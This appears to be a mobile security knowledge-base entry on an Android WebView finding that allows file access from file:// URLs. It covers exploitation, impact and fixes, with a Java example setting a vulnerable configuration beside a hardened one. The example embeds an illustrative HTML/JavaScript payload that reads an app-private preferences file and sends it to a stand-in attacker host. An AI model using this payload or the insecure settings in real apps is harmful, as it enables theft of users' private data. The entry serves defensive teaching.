PTKD Mobile App Security

Severity: medium | M4 | MASVS-PLATFORM-2 | Detection: static analysis | ID: PTKD-WEBVIEW-FILEACCESS

WebView allows file access from web content

setAllowFileAccessFromFileURLs(true) lets JavaScript in a page loaded from a file:// URL read other local files; setAllowUniversalAccessFromFileURLs(true) additionally lets that page reach any origin, so what it reads can be sent anywhere.

How it's exploited

With setAllowFileAccessFromFileURLs(true), a page loaded from a file:// URL can issue XHR requests for other file:// paths and read the response. An attacker who gets one HTML file onto the device (a download, a cached response) and gets the WebView to load it via file:// (for example through a URL taken from an Intent or a deep link) can read cookie databases, SQLite files and other app-private files through the WebView and exfiltrate them, since the renderer reads those files with the app's own permissions.

Why it matters

The boundary between web content and the app's local files breaks: a page loaded from file:// reads app-private storage (cookie stores, databases, shared preferences) that the platform otherwise keeps private to the app.

How to fix it

  1. Call setAllowFileAccessFromFileURLs(false) and setAllowUniversalAccessFromFileURLs(false). Both default to false since API 16, so the finding usually comes from legacy code that enables them explicitly; check every WebSettings site. Unless the app genuinely needs file:// loads, also call setAllowFileAccess(false) (default true below API 30) so a malicious local file cannot be loaded at all.
  2. Serve packaged content through WebViewAssetLoader, which maps app assets and resources onto an https:// origin (https://appassets.androidplatform.net/ by default), instead of loading file:// URLs, and restrict navigation to that origin.
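The following is an added example, not code from the PTKD knowledge base or from any app it analyzes. It shows the legacy configuration the exploitation section describes beside a hardened replacement that follows both fix steps. The class, method names and the `com.example.victim` path are hypothetical; the injected HTML is a constructed illustration of the technique, and the example assumes the AndroidX webkit library and minSdk 21 (so `shouldInterceptRequest(WebView, WebResourceRequest)` is called).

```java
import android.content.Context;
import android.net.Uri;
import android.webkit.WebResourceRequest;
import android.webkit.WebResourceResponse;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import androidx.webkit.WebViewAssetLoader;

/** Hypothetical class: vulnerable vs. hardened WebView setup (added example). */
public final class WebViewFileAccessExample {

    /**
     * Constructed illustration of the injected page described above. Once the
     * WebView loads it from a file:// URL with setAllowFileAccessFromFileURLs(true),
     * the XHR to another file:// path succeeds and the contents leave the device
     * through an image beacon, which needs no CORS permission. The path is a
     * placeholder; a real payload would target cookie stores or databases.
     */
    static final String INJECTED_HTML = "<script>\n"
        + "var x = new XMLHttpRequest();\n"
        + "x.open('GET', 'file:///data/data/com.example.victim/shared_prefs/prefs.xml');\n"
        + "x.onload = function () {\n"
        + "  new Image().src = 'https://attacker.example/c?d=' + encodeURIComponent(x.responseText);\n"
        + "};\n"
        + "x.send();\n"
        + "</script>";

    /** Legacy configuration: file:// content can read other local files. */
    static void configureVulnerable(WebView webView, String urlFromIntent) {
        WebSettings s = webView.getSettings();
        s.setJavaScriptEnabled(true);
        s.setAllowFileAccess(true);                  // file:// pages may be loaded
        s.setAllowFileAccessFromFileURLs(true);      // file:// -> file:// XHR allowed
        s.setAllowUniversalAccessFromFileURLs(true); // file:// -> any origin allowed
        // urlFromIntent may be file:///sdcard/Download/evil.html containing INJECTED_HTML
        webView.loadUrl(urlFromIntent);
    }

    /** Hardened configuration: no file:// access, packaged content served over https://. */
    static void configureHardened(Context ctx, WebView webView, String requestedUrl) {
        WebSettings s = webView.getSettings();
        s.setJavaScriptEnabled(true);
        s.setAllowFileAccess(false);                  // no file:// loads at all
        s.setAllowFileAccessFromFileURLs(false);      // explicit, even though it is the default
        s.setAllowUniversalAccessFromFileURLs(false); // explicit, even though it is the default
        s.setAllowContentAccess(false);               // no content:// either

        // Maps the APK's assets/ directory onto https://appassets.androidplatform.net/assets/
        final WebViewAssetLoader loader = new WebViewAssetLoader.Builder()
            .addPathHandler("/assets/", new WebViewAssetLoader.AssetsPathHandler(ctx))
            .build();

        webView.setWebViewClient(new WebViewClient() {
            @Override
            public WebResourceResponse shouldInterceptRequest(WebView view, WebResourceRequest request) {
                // Returns null for anything outside the asset origin, so it is fetched normally
                return loader.shouldInterceptRequest(request.getUrl());
            }

            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                // Block navigation away from the asset origin (return true = handled, not loaded)
                return !isAssetOrigin(request.getUrl());
            }
        });

        // An externally supplied URL is only honoured if it points at the asset origin.
        String target = isAssetOrigin(Uri.parse(requestedUrl))
            ? requestedUrl
            : "https://" + WebViewAssetLoader.DEFAULT_DOMAIN + "/assets/index.html";
        webView.loadUrl(target);
    }

    /** True only for https://appassets.androidplatform.net/... URLs. */
    static boolean isAssetOrigin(Uri uri) {
        return uri != null
            && "https".equals(uri.getScheme())
            && WebViewAssetLoader.DEFAULT_DOMAIN.equals(uri.getHost());
    }
}
```

The allow-list in `isAssetOrigin` is what makes step 2 effective: serving assets over https:// helps little if `loadUrl` still accepts an arbitrary URL from an Intent, because a file:// or attacker-hosted page could then be loaded instead. When reviewing legacy code, look for every `getSettings()` call site, not only the one in the main Activity, since a single `setAllowFileAccessFromFileURLs(true)` in a helper is enough to reintroduce the finding.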
